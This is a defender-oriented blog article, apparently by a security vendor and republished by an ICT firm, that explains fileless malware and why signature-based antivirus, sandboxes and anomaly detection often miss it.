Threat actors are increasing their use of fileless malware for one simple reason: most organizations aren’t prepared to detect it. Education is the first step in determining what threat these new attacks pose and what you can do to detect and stop fileless malware attacks.
Fileless malware is a significant and increasing threat. While awareness of that fact is growing, there’s still confusion among security practitioners and vendors about the nature of the threat and the requirements for a successful defense strategy.
Part of that confusion is because of most of the security methods, solutions and routines used to detect and prevent cyber security threats remain firmly grounded in addressing file-based attacks. As with any new type of cyber threat, many security-focused professionals need a point of reference, or newsworthy attack, as their driver for altering, updating or replacing their current security workflows.
The goal of every security organization is not to be the first victim of that attack.
A recent survey by Ponemon, the 2017 State of Endpoint Security Risk, showed that fileless attacks rose, as a percent of all malware attacks, from 20% in 2016 to 29% in 2017. It estimated that in 2018, fileless attacks would rise to 35%. Of the 54% of respondents that indicated they were compromised by at least one attack, 77% said those successful
breaches were from fileless attacks.
The goal of this post is to empower you, the security professional, with the knowledge you can use to better understand, prepare for and detect fileless threats. In time, fileless malware threats will be commonplace. Educating yourself early can significantly enhance your security readiness today for better security tomorrow.
True fileless attacks exploit the target system without any file being resident. The entirety of the attack occurs in memory, leaving no trace of the attack on the file system. These attacks have been used in the delivery of all types of malicious content. To date, fileless attacks primarily focus on the exploitation of web browsers and their plug-ins.
These payloads may exhibit full memory-residence and use PowerShell for reconnaissance and lateral movement. Combining advanced fileless attack techniques with memory-resident malware and living-of-the-land methods represents major challenges for traditional defensive techniques at both the network and host level.
Once the target is compromised, fileless attacks typically load their malicious payloads into already running system processes, where they can operate invisibly until the system is powered down or rebooted. In most cases, fileless malware operates exclusively in RAM and leaves no artifacts for post-event forensic analysis. However, other fileless strains attempt to achieve persistence by writing files to hidden directories or by modifying the operating system registry.
Fileless attacks are often used as the initial vector for entering a system, disabling or circumventing tools used to detect more malicious file-based attacks. Once completed, these fileless attacks may move to a new stage which utilizes file-based methods. Thus, tools created to detect file-based attacks might incorrectly report that the initial attack was file-based if they catch the attack at all.
There is some confusion about what is and isn’t a fileless attack. Attacks should not be characterized as fileless if critical phases are transported within a file, such as a Word or Excel document containing a malicious macro or a zip file containing malicious code.
File-based threats like these are commonly associated with phishing exploits and weaponized attachments, which cannot infect a host unless the file is opened by an unwary user. The resulting malware may operate entirely in RAM or write and modify system files to achieve persistence or to compromise system resources. Some of these attacks may also leverage common system utilities, such as PowerShell, to move laterally within an organization without leaving evidence on the host file system.
These file-based attacks are sometimes miscategorized as fileless attacks because they do not produce files on the victim’s machine. However, they are better categorized as memory-resident malware or living-of-the-land attacks.
There is a range of different defenses that organizations have adopted to protect their networks from malicious attacks. These include signature-based solutions including anti-virus (AV) and firewalls, file sandboxes, host-based systems and anomaly detection. Many of these were designed to detect files or traditional threat attributes. Therefore, most don’t work against fileless attacks, and others only provide a partial or after-the-fact solution.
This section goes into detail about each of these types of defense and the capabilities and limitations of each. These solutions generally use a combination of signatures for files, called hashes, and URLs or IPs of known malicious or compromised systems. Fileless malware is designed to bypass these traditional defenses.
First, the lack of an actual file bypasses file signature-based detection as there is no file on which to base a signature. Therefore, even once the attack becomes known, it still bypasses signature-based detection. Second, attackers utilize different registered and compromised points as the location to start their attack, bypassing the value of IP or URL
This means the exact same attack can bypass these defenses again and again, just by changing the point of origin
Anti-virus was designed to detect malicious, known threats through signatures. Fileless malware has no file to compare a signature to, and fileless attacks do not conform to a given signature. This combination allows fileless malware to slip right past AV detection.
Sandboxes are often included in traditional defenses as a second Line for detecting threats missed by signatures. However, sandboxes are not effective against fileless attacks because they are only sent suspicious files. Since fileless attacks don’t have files, there is nothing to send for analysis.
These technologies can be effective at detecting anomalous behavior in systems that have already been compromised. However, these approaches generally fail to prevent the initial compromise and require significant abnormal activity in order to detect a breach.
Part of the failing of these systems is that fileless attacks are designed to look like normal traffic, so they often don’t show up as an anomaly. The detections from these solutions can also be lost in the noise as they alert on all abnormal activity. The abnormal activity could be someone shopping for their spouse’s birthday on a company computer, the introduction of a new process or tool, or even a new hire.
This strategy relies on host-based defenses to protect the infrastructure. Many of these host solutions have started adding methods to detect fileless malware, but they have serious limitations:
Without signatures to detect fileless malware attacks, security systems fail to find these critical attack vectors early enough in the kill chain to prevent damage. Detecting fileless malware requires a very different kind of defense strategy. There are five major challenges that a solution needs to address in order to detect fileless attacks:
Finding fileless malware before the breach is not a simple task. A solution must be capable of detecting fileless malware regardless of OS, handle code obfuscation, operate at network speed, perform true analysis of the code, and do all of this in real time. Let’s take a second look at these five challenges while defining the requirements necessary to address them.
Contact Musato Technologies to learn more about our ICT services that drive your business performance and productivity. An article published by Blue Vector
You must be logged in to post a comment.